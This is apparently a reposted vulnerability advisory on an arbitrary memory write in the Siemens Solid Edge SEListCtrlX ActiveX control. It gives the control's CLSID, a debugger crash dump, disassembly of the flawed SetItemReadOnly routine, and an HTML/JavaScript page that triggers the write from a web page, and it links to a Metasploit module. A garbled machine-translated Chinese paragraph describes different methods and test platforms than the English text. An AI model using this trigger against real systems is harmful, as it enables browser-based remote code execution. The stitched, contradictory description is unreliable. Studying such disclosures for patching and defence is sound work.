SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite RCE

<table><colgroup><col width="NaN%"></colgroup><tbody><tr><td>SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Control SetItemReadOnly&nbsp;<br>Arbitrary Memory Rewrite Remote Code Execution Vulnerability<br>&nbsp;&nbsp;&nbsp;<br>SEListCtrlX ActiveX 安装与西门子 Solid Edge 产品此模块功绩。此漏洞存在几个 api 提供的控制，在那里用户提供的输入处理作为内存的指针，而不进行适当的验证，允许攻击者读取和损坏从目标进程的内存。本模块滥用方法 NumChildren() 和 DeleteItem() 分别达到内存信息泄漏及远程执行代码。本模块对 IE6-IE9 上 Windows XP SP3 和 Windows 7 SP1 中，使用固体边缘 10.4 测试成功。<br><br>tested against: Microsoft Windows Server 2003 r2 sp2<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Microsoft Windows XP sp3<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Internet Explorer 7/8<br>&nbsp;&nbsp;&nbsp;<br>software description:&nbsp;<a href="http://en.wikipedia.org/wiki/Solid_Edge">http://en.wikipedia.org/wiki/Solid_Edge</a><br>&nbsp;&nbsp;&nbsp;<br>vendor site:&nbsp;<a href="http://www.siemens.com/entry/cc/en/">http://www.siemens.com/entry/cc/en/</a><br>&nbsp;&nbsp;&nbsp;<br>download url:&nbsp;<a href="http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm">http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm</a><br>&nbsp;&nbsp;&nbsp;<br>POC:metasploit提供了脚本<a href="http://farlight.org/tools/platforms/windows/remote/28724.rb" rel="nofollow">http://farlight.org/tools/platforms/windows/remote/28724.rb</a><br><br>file tested: SolidEdgeV104ENGLISH_32Bit.exe<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;<br>background:<br>&nbsp;&nbsp;&nbsp;<br>the mentioned software installs an ActiveX control with<br>the following settings:<br>&nbsp;&nbsp;&nbsp;<br>ActiveX settings:<br>ProgID: SELISTCTRLX.SEListCtrlXCtrl.1<br>CLSID: {5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D}<br>binary path: C:\Program Files\Solid Edge ST4\Program\SEListCtrlX.ocx<br>Safe For Scripting (Registry): True<br>Safe For Initialization (Registry): True<br>&nbsp;&nbsp;&nbsp;<br>Vulnerability:<br>&nbsp;&nbsp;&nbsp;<br>This control exposes the SetItemReadOnly() method, see typelib:<br>&nbsp;&nbsp;&nbsp;<br>...<br>/* DISPID=14 */<br>&nbsp;&nbsp;&nbsp;&nbsp;function SetItemReadOnly(<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* VT_VARIANT [12]&nbsp; */ $hItem,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;/* VT_BOOL [11]&nbsp; */ $bReadOnly<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;)<br>&nbsp;&nbsp;&nbsp;&nbsp;{<br>&nbsp;&nbsp;&nbsp;&nbsp;}<br>...<br>&nbsp;&nbsp;&nbsp;<br>(i)<br>By setting to a memory address the first argument<br>and the second one to 'false' you can write a NULL<br>byte inside an arbitrary memory region.<br>&nbsp;&nbsp;&nbsp;<br>(ii)<br>By setting to a memory address the first argument<br>and the second one to 'true' you can write a \x08<br>byte inside an arbitrary memory region.<br>&nbsp;&nbsp;&nbsp;<br>Example crash:<br>&nbsp;&nbsp;&nbsp;<br>EAX 61616161<br>ECX 0417AB44<br>EDX 01B7F530<br>EBX 0000000C<br>ESP 01B7F548<br>EBP 01B7F548<br>ESI 0417A930<br>EDI 027D5DD0 SEListCt.027D5DD0<br>EIP 033FD158 control.033FD158<br>C 0&nbsp; ES 0023 32bit 0(FFFFFFFF)<br>P 1&nbsp; CS 001B 32bit 0(FFFFFFFF)<br>A 0&nbsp; SS 0023 32bit 0(FFFFFFFF)<br>Z 1&nbsp; DS 0023 32bit 0(FFFFFFFF)<br>S 0&nbsp; FS 003B 32bit 7FFD9000(4000)<br>T 0&nbsp; GS 0000 NULL<br>D 0<br>O 0&nbsp; LastErr ERROR_SUCCESS (00000000)<br>EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)<br>ST0 empty -NAN FFFF FFFFFFFF FFFFFFFF<br>ST1 empty 3.3760355862290856960e-4932<br>ST2 empty +UNORM 48F4 00000000 00000000<br>ST3 empty -2.4061003025887744000e+130<br>ST4 empty -UNORM C198 00000000 00000000<br>ST5 empty 0.0<br>ST6 empty 1633771873.0000000000<br>ST7 empty 1633771873.0000000000<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;3 2 1 0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; E S P U O Z D I<br>FST 4000&nbsp; Cond 1 0 0 0&nbsp; Err 0 0 0 0 0 0 0 0&nbsp; (EQ)<br>FCW 027F&nbsp; Prec NEAR,53&nbsp; Mask&nbsp;&nbsp;&nbsp; 1 1 1 1 1 1<br>&nbsp;&nbsp;&nbsp;<br>Call stack of thread 000009B8<br>Address&nbsp;&nbsp;&nbsp; Stack&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Procedure / arguments&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Called from&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Frame<br>01B7F54C&nbsp;&nbsp; 027D5DF3&nbsp;&nbsp; control.?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SEListCt.027D5DED&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 01B7F548<br>01B7F560&nbsp;&nbsp; 787FF820&nbsp;&nbsp; Includes SEListCt.027D5DF3&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mfc100u.787FF81E&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 01B7F55C<br>01B7F56C&nbsp;&nbsp; 78807BF5&nbsp;&nbsp; mfc100u.787FF810&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mfc100u.78807BF0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 01B7F618<br>01B7F61C&nbsp;&nbsp; 78808312&nbsp;&nbsp; ? mfc100u.78807A5B&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; mfc100u.7880830D&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 01B7F618<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;<br>vulnerable code, inside the close control.dll:<br>...<br>;------------------------------------------------------------------------------<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Align&nbsp;&nbsp; 4<br>&nbsp;?SetItemReadOnly@SEListCtrl@@QAEXPAVSEListItem@@H@Z:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;push&nbsp;&nbsp;&nbsp; ebp<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov ebp,esp<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mov eax,[ebp+08h]<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;test&nbsp;&nbsp;&nbsp; eax,eax<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jz&nbsp; L1011D15C<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;cmp dword ptr [ebp+0Ch],00000000h<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;jz&nbsp; L1011D158<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or&nbsp; dword ptr [eax+2Ch],00000008h &lt;-------------------- it crashes here<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pop ebp<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;retn&nbsp;&nbsp;&nbsp; 0008h<br>;------------------------------------------------------------------------------<br>...<br>&nbsp;&nbsp;&nbsp;<br>...<br>;------------------------------------------------------------------------------<br>&nbsp;L1011D158:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;and dword ptr [eax+2Ch],FFFFFFF7h &lt;-------------------- or here&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>&nbsp;L1011D15C:<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;pop ebp<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;retn&nbsp;&nbsp;&nbsp; 0008h<br>;------------------------------------------------------------------------------<br>...<br>&nbsp;&nbsp;&nbsp;<br>As attachment, code to reproduce the crash.<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;<br>&nbsp;&nbsp;&nbsp;<br>&lt;!-- saved from url=(0014)about:internet --&gt;<br>&lt;html&gt;<br>&lt;object classid='clsid:5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D' id='obj' /&gt;<br>&lt;/object&gt;<br>&lt;script language='javascript'&gt;<br>//obj.SetItemReadOnly(0x61616161,false);<br>obj.SetItemReadOnly(0x61616161,true);<br>&lt;/script&gt;<br></td></tr></tbody></table>